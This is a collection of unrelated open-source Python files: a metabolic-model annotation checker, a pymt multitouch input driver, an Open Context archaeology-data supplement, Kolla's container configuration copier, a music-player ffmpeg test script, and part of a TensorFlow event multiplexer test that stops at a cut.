re.compile(
r"^\d+\.-\.-\.-|\d+\.\d+\.-\.-|"
r"\d+\.\d+\.\d+\.-|"
r"\d+\.\d+\.\d+\.(n)?\d+$"
),
),
("biocyc", re.compile(r"^[A-Z-0-9]+(?<!CHEBI)" r"(\:)?[A-Za-z0-9+_.%-]+$")),
]
)
METABOLITE_ANNOTATIONS = OrderedDict(
[
("pubchem.compound", re.compile(r"^\d+$")),
("kegg.compound", re.compile(r"^C\d+$")),
("seed.compound", re.compile(r"^cpd\d+$")),
("inchikey", re.compile(r"^[A-Z]{14}\-[A-Z]{10}(\-[A-Z])?")),
(
"inchi",
re.compile(
r"^InChI\=1S?\/[A-Za-z0-9\.]+(\+[0-9]+)?"
r"(\/[cnpqbtmsih][A-Za-z0-9\-\+\(\)\,\/\?\;\.]+)*$"
),
),
("chebi", re.compile(r"^CHEBI:\d+$")),
("hmdb", re.compile(r"^HMDB\d{5}$")),
(
"reactome",
re.compile(r"(^R-[A-Z]{3}-[0-9]+(-[0-9]+)?$)|(^REACT_\d+(\.\d+)?$)"),
),
("metanetx.chemical", re.compile(r"^MNXM\d+$")),
("bigg.metabolite", re.compile(r"^[a-z_A-Z0-9]+$")),
("biocyc", re.compile(r"^[A-Z-0-9]+(?<!CHEBI)(\:)?[A-Za-z0-9+_.%-]+$")),
]
)
def find_components_without_annotation(model, components):
"""
Find model components with empty annotation attributes.
Parameters
----------
model : cobra.Model
A cobrapy metabolic model.
components : {"metabolites", "reactions", "genes"}
A string denoting `cobra.Model` components.
Returns
-------
list
The components without any annotation.
"""
return [
elem
for elem in getattr(model, components)
if elem.annotation is None or len(elem.annotation) == 0
]
def generate_component_annotation_overview(elements, db):
"""
Tabulate which MIRIAM databases the component's annotation match.
Parameters
----------
elements : list
Elements of a model, either metabolites, reactions, or genes.
db : str
One of the MIRIAM database identifiers.
Returns
-------
list
The components that are not annotated with the specified MIRIAM
database.
"""
return [elem for elem in elements if db not in elem.annotation]
def generate_component_annotation_miriam_match(elements, component, db):
"""
Tabulate which MIRIAM databases the element's annotation match.
If the relevant MIRIAM identifier is not in an element's annotation it is
ignored.
Parameters
----------
elements : list
Elements of a model, either metabolites or reactions.
component : {"metabolites", "reactions"}
A string denoting a type of ``cobra.Model`` component.
db : str
One of the MIRIAM database identifiers.
Returns
-------
list
The components whose annotation does not match the pattern for the
MIRIAM database.
"""
def is_faulty(annotation, key, pattern):
# Ignore missing annotation for this database.
if key not in annotation:
return False
test = annotation[key]
if isinstance(test, native_str):
return pattern.match(test) is None
else:
return any(pattern.match(elem) is None for elem in test)
pattern = {
"metabolites": METABOLITE_ANNOTATIONS,
"reactions": REACTION_ANNOTATIONS,
"genes": GENE_PRODUCT_ANNOTATIONS,
}[component][db]
return [elem for elem in elements if is_faulty(elem.annotation, db, pattern)]
def generate_component_id_namespace_overview(model, components):
"""
Tabulate which MIRIAM databases the component's identifier matches.
Parameters
----------
model : cobra.Model
A cobrapy metabolic model.
components : {"metabolites", "reactions", "genes"}
A string denoting `cobra.Model` components.
Returns
-------
pandas.DataFrame
The index of the table is given by the component identifiers. Each
column corresponds to one MIRIAM database and a Boolean entry
determines whether the annotation matches.
"""
patterns = {
"metabolites": METABOLITE_ANNOTATIONS,
"reactions": REACTION_ANNOTATIONS,
"genes": GENE_PRODUCT_ANNOTATIONS,
}[components]
databases = list(patterns)
data = list()
index = list()
for elem in getattr(model, components):
index.append(elem.id)
data.append(tuple(patterns[db].match(elem.id) is not None for db in databases))
df = pd.DataFrame(data, index=index, columns=databases)
if components != "genes":
# Clean up of the dataframe. Unfortunately the Biocyc patterns match
# broadly. Hence, whenever a Metabolite or Reaction ID matches to any
# DB pattern AND the Biocyc pattern we have to assume that this is a
# false positive.
# First determine all rows in which 'biocyc' and other entries are
# True simultaneously and use this Boolean series to create another
# column temporarily.
df["duplicate"] = df[df["biocyc"]].sum(axis=1) >= 2
# Replace all nan values with False
df["duplicate"].fillna(False, inplace=True)
# Use the additional column to index the original dataframe to identify
# false positive biocyc hits and set them to False.
df.loc[df["duplicate"], "biocyc"] = False
# Delete the additional column
del df["duplicate"]
return df
|
'''
MTDev: Native support of Multitouch device on Linux, using libmtdev.
Mtdev project is a part of Ubuntu Maverick multitouch architecture.
You can read more on http://wiki.ubuntu.com/Multitouch
To configure MTDev, it's preferable to use probesysfs providers.
Check :py:class:`~pymt.input.providers.probesysfs` for more information.
Otherwise, you can put in your configuration ::
[input]
# devicename = hidinput,/dev/input/eventXX
acert230h = mtdev,/dev/input/event2
.. note::
You must have read access to the input event.
You have the possibility to use custom range for some X, Y and pressure value.
On some drivers, the range reported is invalid.
To fix that, you can add one of theses options on the argument line :
* invert_x : 1 to invert X axis
* invert_y : 1 to invert Y axis
* min_position_x : X minimum
* max_position_x : X maximum
* min_position_y : Y minimum
* max_position_y : Y maximum
* min_pressure : pressure minimum
* max_pressure : pressure maximum
* min_touch_major : width shape minimum
* max_touch_major : width shape maximum
* min_touch_minor : width shape minimum
* max_touch_minor : height shape maximum
'''
__all__ = ('MTDTouchProvider', 'MTDTouch')
import os
from pymt.input.touch import Touch
from pymt.input.shape import TouchShapeRect
class MTDTouch(Touch):
def depack(self, args):
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
if 'size_w' in args and 'size_h' in args:
self.shape = TouchShapeRect()
self.shape.width = args['size_w']
self.shape.height = args['size_h']
self.profile.append('shape')
if 'pressure' in args:
self.pressure = args['pressure']
self.profile.append('pressure')
super(MTDTouch, self).depack(args)
def __str__(self):
return '<MTDTouch id=%d pos=(%f, %f) device=%s>' % (self.id, self.sx, self.sy, self.device)
if 'PYMT_DOC' in os.environ:
# documentation hack
MTDTouchProvider = None
else:
import threading
import collections
from pymt.lib.mtdev import Device, \
MTDEV_TYPE_EV_ABS, MTDEV_CODE_SLOT, MTDEV_CODE_POSITION_X, \
MTDEV_CODE_POSITION_Y, MTDEV_CODE_PRESSURE, \
MTDEV_CODE_TOUCH_MAJOR, MTDEV_CODE_TOUCH_MINOR, \
MTDEV_CODE_TRACKING_ID, MTDEV_ABS_POSITION_X, \
MTDEV_ABS_POSITION_Y, MTDEV_ABS_TOUCH_MINOR, \
MTDEV_ABS_TOUCH_MAJOR
from pymt.input.provider import TouchProvider
from pymt.input.factory import TouchFactory
from pymt.logger import pymt_logger
class MTDTouchProvider(TouchProvider):
options = ('min_position_x', 'max_position_x',
'min_position_y', 'max_position_y',
'min_pressure', 'max_pressure',
'min_touch_major', 'max_touch_major',
'min_touch_minor', 'min_touch_major',
'invert_x', 'invert_y')
def __init__(self, device, args):
super(MTDTouchProvider, self).__init__(device, args)
self._device = None
self.input_fn = None
self.default_ranges = dict()
# split arguments
args = args.split(',')
if not args:
pymt_logger.error('MTD: No filename pass to MTD configuration')
pymt_logger.error('MTD: Use /dev/input/event0 for example')
return None
# read filename
self.input_fn = args[0]
pymt_logger.info('MTD: Read event from <%s>' % self.input_fn)
# read parameters
for arg in args[1:]:
if arg == '':
continue
arg = arg.split('=')
# ensure it's a key = value
if len(arg) != 2:
pymt_logger.error('MTD: invalid parameter %s, not in key=value format.' % arg)
continue
# ensure the key exist
key, value = arg
if key not in MTDTouchProvider.options:
pymt_logger.error('MTD: unknown %s option' % key)
continue
# ensure the value
try:
self.default_ranges[key] = int(value)
except ValueError:
pymt_logger.error('MTD: invalid value %s for option %s' % (key, value))
continue
# all good!
pymt_logger.info('MTD: Set custom %s to %d' % (key, int(value)))
def start(self):
if self.input_fn is None:
return
self.uid = 0
self.queue = collections.deque()
self.thread = threading.Thread(
target=self._thread_run,
kwargs=dict(
queue=self.queue,
input_fn=self.input_fn,
device=self.device,
default_ranges=self.default_ranges
))
self.thread.daemon = True
self.thread.start()
def _thread_run(self, **kwargs):
input_fn = kwargs.get('input_fn')
queue = kwargs.get('queue')
device = kwargs.get('device')
drs = kwargs.get('default_ranges').get
touches = {}
touches_sent = []
point = {}
l_points = {}
def process(points):
for args in points:
tid = args['id']
try:
touch = touches[tid]
except KeyError:
touch = MTDTouch(device, tid, args)
touches[touch.id] = touch
touch.move(args)
action = 'move'
if tid not in touches_sent:
action = 'down'
touches_sent.append(tid)
if 'delete' in args:
action = 'up'
del args['delete']
del touches[touch.id]
touches_sent.remove(tid)
queue.append((action, touch))
def normalize(value, vmin, vmax):
return (value - vmin) / float(vmax - vmin)
# open mtdev device
_fn = self.input_fn
_slot = 0
_device = Device(_fn)
_changes = set()
# prepare some vars to get limit of some component
ab = _device.get_abs(MTDEV_ABS_POSITION_X)
range_min_position_x = drs('min_position_x', ab.minimum)
range_max_position_x = drs('max_position_x', ab.maximum)
pymt_logger.info('MTD: <%s> range position X is %d - %d' %
(_fn, range_min_position_x, range_max_position_x))
ab = _device.get_abs(MTDEV_ABS_POSITION_Y)
range_min_position_y = drs('min_position_y', ab.minimum)
range_max_position_y = drs('max_position_y', ab.maximum)
pymt_logger.info('MTD: <%s> range position Y is %d - %d' %
(_fn, range_min_position_y, range_max_position_y))
ab = _device.get_abs(MTDEV_ABS_TOUCH_MAJOR)
range_min_major = drs('min_touch_major', ab.minimum)
range_max_major = drs('max_touch_major', ab.maximum)
pymt_logger.info('MTD: <%s> range touch major is %d - %d' %
(_fn, range_min_major, range_max_major))
ab = _device.get_abs(MTDEV_ABS_TOUCH_MINOR)
range_min_minor = drs('min_touch_minor', ab.minimum)
range_max_minor = drs('max_touch_minor', ab.maximum)
pymt_logger.info('MTD: <%s> range touch minor is %d - %d' %
(_fn, range_min_minor, range_max_minor))
range_min_pressure = drs('min_pressure', 0)
range_max_pressure = drs('max_pressure', 255)
pymt_logger.info('MTD: <%s> range pressure is %d - %d' %
(_fn, range_min_pressure, range_max_pressure))
invert_x = int(bool(drs('invert_x', 0)))
invert_y = int(bool(drs('invert_y', 0)))
pymt_logger.info('MTD: <%s> axes invertion: X is %d, Y is %d' %
(_fn, invert_x, invert_y))
while _device:
# idle as much as we can.
while _device.idle(1000):
continue
# got data, read all without redoing idle
while True:
data = _device.get()
if data is None:
break
# set the working slot
if data.type == MTDEV_TYPE_EV_ABS and \
data.code == MTDEV_CODE_SLOT:
_slot = data.value
continue
# fill the slot
if not _slot in l_points:
l_points[_slot] = dict()
point = l_points[_slot]
ev_value = data.value
ev_code = data.code
if ev_code == MTDEV_CODE_POSITION_X:
val = normalize(ev_value,
range_min_position_x, range_max_position_x)
if invert_x:
val = 1. - val
point['x'] = val
elif ev_code == MTDEV_CODE_POSITION_Y:
val = 1. - normalize(ev_value,
range_min_position_y, range_max_position_y)
if invert_y:
val = 1. - val
point['y'] = val
elif ev_code == MTDEV_CODE_PRESSURE:
point['pressure'] = normalize(ev_value,
range_min_pressure, range_max_pressure)
elif ev_code == MTDEV_CODE_TOUCH_MAJOR:
point['size_w'] = normalize(ev_value,
range_min_major, range_max_major)
elif ev_code == MTDEV_CODE_TOUCH_MINOR:
point['size_h'] = normalize(ev_value,
range_min_minor, range_max_minor)
elif ev_code == MTDEV_CODE_TRACKING_ID:
if ev_value == -1:
point['delete'] = True
else:
point['id'] = ev_value
else:
# unrecognized command, ignore.
continue
_changes.add(_slot)
# push all changes
if _changes:
process([l_points[x] for x in _changes])
_changes.clear()
def update(self, dispatch_fn):
# dispatch all event from threads
try:
while True:
event_type, touch = self.queue.popleft()
dispatch_fn(event_type, touch)
except:
pass
TouchFactory.register('mtdev', MTDTouchProvider)
|
from opencontext_py.libs.general import LastUpdatedOrderedDict
from opencontext_py.apps.ocitems.ocitem.models import OCitem
from opencontext_py.apps.ldata.catallivingarchive.api import CatalLivingArchiveAPI
class SubjectSupplement():
""" Class for adding related, supplemental information about types
"""
def __init__(self, item_json):
self.item_json = item_json
def get_catal_related(self):
""" Check to see if this item has related data
in the Çatalhöyük Living Archive
"""
label = self.item_json['label']
category_list = []
project_list = []
if 'category' in self.item_json:
category_list = self.item_json['category']
if 'dc-terms:isPartOf' in self.item_json:
project_list = self.item_json['dc-terms:isPartOf']
catal_api = CatalLivingArchiveAPI()
catal_api.check_relevance(category_list,
project_list)
if catal_api.relevant:
catal_api.get_unit(label)
if catal_api.has_data:
editorial_pred = LastUpdatedOrderedDict()
editorial_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#editorialNote'
editorial_pred['slug'] = 'skos-editorialnote'
editorial_pred['label'] = 'About Çatalhöyük Living Archive Data'
editorial_pred['oc-gen:predType'] = 'variable'
editorial_pred['type'] = 'xsd:string'
props_pred = LastUpdatedOrderedDict()
props_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#definition'
props_pred['slug'] = 'skos-definition'
props_pred['label'] = 'Çatalhöyük Living Archive: Unit Properties'
props_pred['oc-gen:predType'] = 'variable'
props_pred['type'] = 'xsd:string'
finds_pred = LastUpdatedOrderedDict()
finds_pred['owl:sameAs'] = 'http://www.w3.org/2004/02/skos/core#note'
finds_pred['slug'] = 'skos-note'
finds_pred['label'] = 'Çatalhöyük Living Archive: Unit Finds'
finds_pred['oc-gen:predType'] = 'variable'
finds_pred['type'] = 'xsd:string'
self.item_json['@context'][1]['skos:editorialNote'] = editorial_pred
if catal_api.props_count > 0:
self.item_json['@context'][1]['skos:definition'] = props_pred
if catal_api.finds_count > 0:
self.item_json['@context'][1]['skos:note'] = finds_pred
self.add_catal_observation(catal_api)
return self.item_json
def add_catal_observation(self, catal_api):
""" Adds an observation for Catal API data """
if 'oc-gen:has-obs' not in self.item_json:
self.item_json['oc-gen:has-obs'] = []
catal_obs = LastUpdatedOrderedDict()
catal_obs['id'] = '#obs-' + str(len(self.item_json['oc-gen:has-obs']) + 1)
catal_obs['oc-gen:sourceID'] = catal_api.BASE_HTML_URL
catal_obs['oc-gen:obsStatus'] = 'active'
catal_obs[OCitem.PREDICATES_OCGEN_OBSLABEL] = 'Çatalhöyük Living Archive Data'
catal_obs['type'] = 'oc-gen:observations'
if catal_api.props_count > 0:
catal_obs['skos:definition'] = catal_api.properties
if catal_api.finds_count > 0:
catal_obs['skos:note'] = catal_api.finds
editorial = LastUpdatedOrderedDict()
editorial['id'] = '#string-catal-editorial'
note = ''
note += '<p>The Çatalhöyük Living Archive describes this unit with: </>'
note += '<ul>'
if catal_api.props_count > 0:
note += '<li><strong>' + str(catal_api.props_count) + '</strong> descriptive properties</li>'
if catal_api.finds_count > 0:
note += '<li><strong>' + str(catal_api.finds_count) + '</strong> finds (other than animal bones)</li>'
note += '</ul>'
note += '<p><small>Open Context requested these current ("live") data through an external API. '
note += 'The <a href="http://catalhoyuk.stanford.edu//" target="_blank">Çatalhöyük Living Archive</a> '
note += 'has powerful analysis and visualization tools for use with the comprehensive '
note += 'database documenting recent excavations at Çatalhöyük. '
note += 'Stanford University sponsored and hosts this project.</small></p>'
editorial['xsd:string'] = note
catal_obs['skos:editorialNote'] = []
catal_obs['skos:editorialNote'].append(editorial)
self.item_json['oc-gen:has-obs'].append(catal_obs)
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import glob
import grp
import json
import logging
import os
import pwd
import shutil
import sys
# TODO(rhallisey): add docstring.
logging.basicConfig()
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
class ExitingException(Exception):
def __init__(self, message, exit_code=1):
super(ExitingException, self).__init__(message)
self.exit_code = exit_code
class ImmutableConfig(ExitingException):
pass
class InvalidConfig(ExitingException):
pass
class MissingRequiredSource(ExitingException):
pass
class UserNotFound(ExitingException):
pass
class ConfigFileBadState(ExitingException):
pass
class ConfigFile(object):
def __init__(self, source, dest, owner=None, perm=None, optional=False,
preserve_properties=False, merge=False):
self.source = source
self.dest = dest
self.owner = owner
self.perm = perm
self.optional = optional
self.merge = merge
self.preserve_properties = preserve_properties
def __str__(self):
return '<ConfigFile source:"{}" dest:"{}">'.format(self.source,
self.dest)
def _copy_file(self, source, dest):
self._delete_path(dest)
# dest endswith / means copy the <source> to <dest> folder
LOG.info('Copying %s to %s', source, dest)
if self.merge and self.preserve_properties and os.path.islink(source):
link_target = os.readlink(source)
os.symlink(link_target, dest)
else:
shutil.copy(source, dest)
self._set_properties(source, dest)
def _merge_directories(self, source, dest):
if os.path.isdir(source):
if os.path.lexists(dest) and not os.path.isdir(dest):
self._delete_path(dest)
if not os.path.isdir(dest):
LOG.info('Creating directory %s', dest)
os.makedirs(dest)
self._set_properties(source, dest)
dir_content = os.listdir(source)
for to_copy in dir_content:
self._merge_directories(os.path.join(source, to_copy),
os.path.join(dest, to_copy))
else:
self._copy_file(source, dest)
def _delete_path(self, path):
if not os.path.lexists(path):
return
LOG.info('Deleting %s', path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def _create_parent_dirs(self, path):
parent_path = os.path.dirname(path)
if not os.path.exists(parent_path):
os.makedirs(parent_path)
def _set_properties(self, source, dest):
if self.preserve_properties:
self._set_properties_from_file(source, dest)
else:
self._set_properties_from_conf(dest)
def _set_properties_from_file(self, source, dest):
shutil.copystat(source, dest)
stat = os.stat(source)
os.chown(dest, stat.st_uid, stat.st_gid)
def _set_properties_from_conf(self, path):
config = {'permissions':
[{'owner': self.owner, 'path': path, 'perm': self.perm}]}
handle_permissions(config)
def copy(self):
sources = glob.glob(self.source)
if not self.optional and not sources:
raise MissingRequiredSource('%s file is not found' % self.source)
# skip when there is no sources and optional
elif self.optional and not sources:
return
for source in sources:
dest = self.dest
# dest endswith / means copy the <source> into <dest> folder,
# otherwise means copy the source to dest
if dest.endswith(os.sep):
dest = os.path.join(dest, os.path.basename(source))
if not self.merge:
self._delete_path(dest)
self._create_parent_dirs(dest)
try:
self._merge_directories(source, dest)
except OSError:
# If a source is tried to merge with a read-only mount, it
# may throw an OSError. Because we don't print the source or
# dest anywhere, let's catch the exception and log a better
# message to help with tracking down the issue.
LOG.error('Unable to merge %s with %s', source, dest)
raise
def _cmp_file(self, source, dest):
# check exsit
if (os.path.exists(source) and
not self.optional and
not os.path.exists(dest)):
return False
# check content
with open(source) as f1, open(dest) as f2:
if f1.read() != f2.read():
LOG.error('The content of source file(%s) and'
' dest file(%s) are not equal.', source, dest)
return False
# check perm
file_stat = os.stat(dest)
actual_perm = oct(file_stat.st_mode)[-4:]
if self.perm != actual_perm:
LOG.error('Dest file does not have expected perm: %s, actual: %s',
self.perm, actual_perm)
return False
# check owner
desired_user, desired_group = user_group(self.owner)
actual_user = pwd.getpwuid(file_stat.st_uid)
if actual_user.pw_name != desired_user:
LOG.error('Dest file does not have expected user: %s,'
' actual: %s ', desired_user, actual_user.pw_name)
return False
actual_group = grp.getgrgid(file_stat.st_gid)
if actual_group.gr_name != desired_group:
LOG.error('Dest file does not have expected group: %s,'
' actual: %s ', desired_group, actual_group.gr_name)
return False
return True
def _cmp_dir(self, source, dest):
for root, dirs, files in os.walk(source):
for dir_ in dirs:
full_path = os.path.join(root, dir_)
dest_full_path = os.path.join(dest, os.path.relpath(source,
full_path))
dir_stat = os.stat(dest_full_path)
actual_perm = oct(dir_stat.st_mode)[-4:]
if self.perm != actual_perm:
LOG.error('Dest dir does not have expected perm: %s,'
' actual %s', self.perm, actual_perm)
return False
for file_ in files:
full_path = os.path.join(root, file_)
dest_full_path = os.path.join(dest, os.path.relpath(source,
full_path))
if not self._cmp_file(full_path, dest_full_path):
return False
return True
def check(self):
bad_state_files = []
sources = glob.glob(self.source)
if not sources and not self.optional:
raise MissingRequiredSource('%s file is not found' % self.source)
elif self.optional and not sources:
return
for source in sources:
dest = self.dest
# dest endswith / means copy the <source> into <dest> folder,
# otherwise means copy the source to dest
if dest.endswith(os.sep):
dest = os.path.join(dest, os.path.basename(source))
if os.path.isdir(source) and not self._cmp_dir(source, dest):
bad_state_files.append(source)
elif not self._cmp_file(source, dest):
bad_state_files.append(source)
if len(bad_state_files) != 0:
msg = 'Following files are in bad state: %s' % bad_state_files
raise ConfigFileBadState(msg)
def validate_config(config):
required_keys = {'source', 'dest'}
if 'command' not in config:
raise InvalidConfig('Config is missing required "command" key')
# Validate config sections
for data in config.get('config_files', list()):
# Verify required keys exist.
if not set(data.keys()) >= required_keys:
message = 'Config is missing required keys: %s' % required_keys
raise InvalidConfig(message)
if ('owner' not in data or 'perm' not in data) \
and not data.get('preserve_properties', False):
raise InvalidConfig(
'Config needs preserve_properties or owner and perm')
def validate_source(data):
source = data.get('source')
# Only check existence if no wildcard found
if '*' not in source:
if not os.path.exists(source):
if data.get('optional'):
LOG.info("%s does not exist, but is not required", source)
return False
else:
raise MissingRequiredSource(
"The source to copy does not exist: %s" % source)
return True
def load_config():
def load_from_env():
config_raw = os.environ.get("KOLLA_CONFIG")
if config_raw is None:
return None
# Attempt to read config
try:
return json.loads(config_raw)
except ValueError:
raise InvalidConfig('Invalid json for Kolla config')
def load_from_file():
config_file = os.environ.get("KOLLA_CONFIG_FILE")
if not config_file:
config_file = '/var/lib/kolla/config_files/config.json'
LOG.info("Loading config file at %s", config_file)
# Attempt to read config file
with open(config_file) as f:
try:
return json.load(f)
except ValueError:
raise InvalidConfig(
"Invalid json file found at %s" % config_file)
except IOError as e:
raise InvalidConfig(
"Could not read file %s: %r" % (config_file, e))
config = load_from_env()
if config is None:
config = load_from_file()
LOG.info('Validating config file')
validate_config(config)
return config
def copy_config(config):
if 'config_files' in config:
LOG.info('Copying service configuration files')
for data in config['config_files']:
config_file = ConfigFile(**data)
config_file.copy()
else:
LOG.debug('No files to copy found in config')
LOG.info('Writing out command to execute')
LOG.debug("Command is: %s", config['command'])
# The value from the 'command' key will be written to '/run_command'
cmd = '/run_command'
with open(cmd, 'w+') as f:
f.write(config['command'])
# Make sure the generated file is readable by all users
try:
os.chmod(cmd, 0o644)
except OSError:
LOG.exception('Failed to set permission of %s to 0o644', cmd)
def user_group(owner):
if ':' in owner:
user, group = owner.split(':', 1)
if not group:
group = user
else:
user, group = owner, owner
return user, group
def handle_permissions(config):
for permission in config.get('permissions', list()):
path = permission.get('path')
owner = permission.get('owner')
recurse = permission.get('recurse', False)
perm = permission.get('perm')
desired_user, desired_group = user_group(owner)
uid = pwd.getpwnam(desired_user).pw_uid
gid = grp.getgrnam(desired_group).gr_gid
def set_perms(path, uid, gid, perm):
LOG.info('Setting permission for %s', path)
if not os.path.exists(path):
LOG.warning('%s does not exist', path)
return
try:
os.chown(path, uid, gid)
except OSError:
LOG.exception('Failed to change ownership of %s to %s:%s',
path, uid, gid)
if perm:
# NOTE(Jeffrey4l): py3 need '0oXXX' format for octal literals,
# and py2 support such format too.
if len(perm) == 4 and perm[1] != 'o':
perm = ''.join([perm[:1], 'o', perm[1:]])
perm = int(perm, base=0)
try:
os.chmod(path, perm)
except OSError:
LOG.exception('Failed to set permission of %s to %s',
path, perm)
for dest in glob.glob(path):
set_perms(dest, uid, gid, perm)
if recurse and os.path.isdir(dest):
for root, dirs, files in os.walk(dest):
for dir_ in dirs:
set_perms(os.path.join(root, dir_), uid, gid, perm)
for file_ in files:
set_perms(os.path.join(root, file_), uid, gid, perm)
def execute_config_strategy(config):
config_strategy = os.environ.get("KOLLA_CONFIG_STRATEGY")
LOG.info("Kolla config strategy set to: %s", config_strategy)
if config_strategy == "COPY_ALWAYS":
copy_config(config)
handle_permissions(config)
elif config_strategy == "COPY_ONCE":
if os.path.exists('/configured'):
raise ImmutableConfig(
"The config strategy prevents copying new configs",
exit_code=0)
else:
copy_config(config)
handle_permissions(config)
os.mknod('/configured')
else:
raise InvalidConfig('KOLLA_CONFIG_STRATEGY is not set properly')
def execute_config_check(config):
for data in config['config_files']:
config_file = ConfigFile(**data)
config_file.check()
def main():
try:
parser = argparse.ArgumentParser()
parser.add_argument('--check',
action='store_true',
required=False,
help='Check whether the configs changed')
args = parser.parse_args()
config = load_config()
if args.check:
execute_config_check(config)
else:
execute_config_strategy(config)
except ExitingException as e:
LOG.error("%s: %s", e.__class__.__name__, e)
return e.exit_code
except Exception:
LOG.exception('Unexpected error:')
return 2
return 0
if __name__ == "__main__":
sys.exit(main())
|
# MusicPlayer, https://github.com/albertz/music-player
# Copyright (c) 2012, Albert Zeyer, www.az2000.de
# All rights reserved.
# This code is under the 2-clause BSD license, see License.txt in the root directory of this project.
import better_exchook
better_exchook.install()
class Song:
def __init__(self, fn):
self.url = fn
self.f = open(fn)
def readPacket(self, bufSize):
s = self.f.read(bufSize)
return s
def seekRaw(self, offset, whence):
r = self.f.seek(offset, whence)
return self.f.tell()
import sys, os
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
files = [
"~/Music/Classic/Glenn Gould Plays Bach/Two- & Three-Part Inventions - Gould/19 Bach - Invention 13 in a (BWV 784).mp3",
"~/Music/Rock/Tool/Lateralus/09 Lateralus.flac",
"~/Music/Cults - Cults 7/Cults - Cults 7- - 03 The Curse.flac",
"~/Music/Special/zorba/(01) - Theme From Zorba The Greek.ogg",
"~/Music/Classic/Glenn Gould Plays Bach/French Suites, BWV812-7 - Gould/Bach, French Suite 5 in G, BWV816 - 5 Bourree.mp3",
"~/Music/Electronic/Von Paul Kalkbrenner - Aaron.mp3",
"~/Music/Electronic/One Day_Reckoning Song (Wankelmut Remix) - Asaf Avidan & the Mojos.mp3",
"~/Music/Electronic/Swing & Electro Swing/Parov Stelar/2008 - Daylight (Japan Only)/03 - Charlestone Butterfly.flac", # this one has replaygain metadata
]
files = map(os.path.expanduser, files)
filename = files[7]
print(os.path.basename(filename))
assert os.path.isfile(filename)
import ffmpeg
metadata = ffmpeg.getMetadata(Song(filename))
from pprint import pprint
pprint(metadata)
duration, replaygain = ffmpeg.calcReplayGain(Song(filename))
print("duration: %f" % duration)
print("replaygain: %f" % replaygain)
print("gain factor: %f" % (10. ** (replaygain / 20)))
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
import shutil
from tensorflow.python.framework import test_util
from platform import gfile
from platform import googletest
from summary import event_accumulator
from summary import event_multiplexer
def _AddEvents(path):
if not gfile.IsDirectory(path):
gfile.MakeDirs(path)
fpath = os.path.join(path, 'hypothetical.tfevents.out')
with gfile.GFile(fpath, 'w') as f:
f.write('')
return fpath
def _CreateCleanDirectory(path):
if gfile.IsDirectory(path):
gfile.DeleteRecursively(path)
gfile.MkDir(path)
class _FakeAccumulator(object):
def __init__(self, path):
self._path = path
self.reload_called = False
self._node_names_to_health_pills = {'Add': ['hp1', 'hp2']}
def Tags(self):
return {event_accumulator.IMAGES: ['im1', 'im2'],
event_accumulator.AUDIO: ['snd1', 'snd2'],
event_accumulator.HISTOGRAMS: ['hst1', 'hst2'],
event_accumulator.COMPRESSED_HISTOGRAMS: ['cmphst1', 'cmphst2'],
event_accumulator.SCALARS: ['sv1', 'sv2']}
def FirstEventTimestamp(self):
return 0
def _TagHelper(self, tag_name, enum):
if tag_name not in self.Tags()[enum]:
raise KeyError
return ['%s/%s' % (self._path, tag_name)]
def Scalars(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.SCALARS)
def HealthPills(self, node_name):
if node_name not in self._node_names_to_health_pills:
raise KeyError
health_pills = self._node_names_to_health_pills[node_name]
return [self._path + '/' + health_pill for health_pill in health_pills]
def Histograms(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.HISTOGRAMS)
def CompressedHistograms(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.COMPRESSED_HISTOGRAMS)
def Images(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.IMAGES)
def Audio(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.AUDIO)
def Tensors(self, tag_name):
return self._TagHelper(tag_name, event_accumulator.TENSORS)
def Reload(self):
self.reload_called = True
# pylint: disable=unused-argument
def _GetFakeAccumulator(
path,
size_guidance=None,
compression_bps=None,
purge_orphaned_data=None):
return _FakeAccumulator(path)
# pylint: enable=unused-argument
class EventMultiplexerTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EventMultiplexerTest, self).setUp()
self.stubs = googletest.StubOutForTesting()
self.stubs.Set(event_accumulator, 'EventAccumulator', _GetFakeAccumulator)
def tearDown(self):
self.stubs.CleanUp()
def testEmptyLoader(self):
x = event_multiplexer.EventMultiplexer()
self.assertEqual(x.Runs(), {})
def testRunNamesRespected(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertItemsEqual(sorted(x.Runs().keys()), ['run1', 'run2'])
self.assertEqual(x._GetAccumulator('run1')._path, 'path1')
self.assertEqual(x._GetAccumulator('run2')._path, 'path2')
def testReload(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
self.assertFalse(x._GetAccumulator('run1').reload_called)
self.assertFalse(x._GetAccumulator('run2').reload_called)
x.Reload()
self.assertTrue(x._GetAccumulator('run1').reload_called)
self.assertTrue(x._GetAccumulator('run2').reload_called)
def testScalars(self):
x = event_multiplexer.EventMultiplexer({'run1': 'path1', 'run2': 'path2'})
run1_actual = x.Scalars('run1', 'sv1')
run1_expected = ['path1/sv1']
self.assertEqual(run1_expected, run1_actual)
def testHealthPills(self):
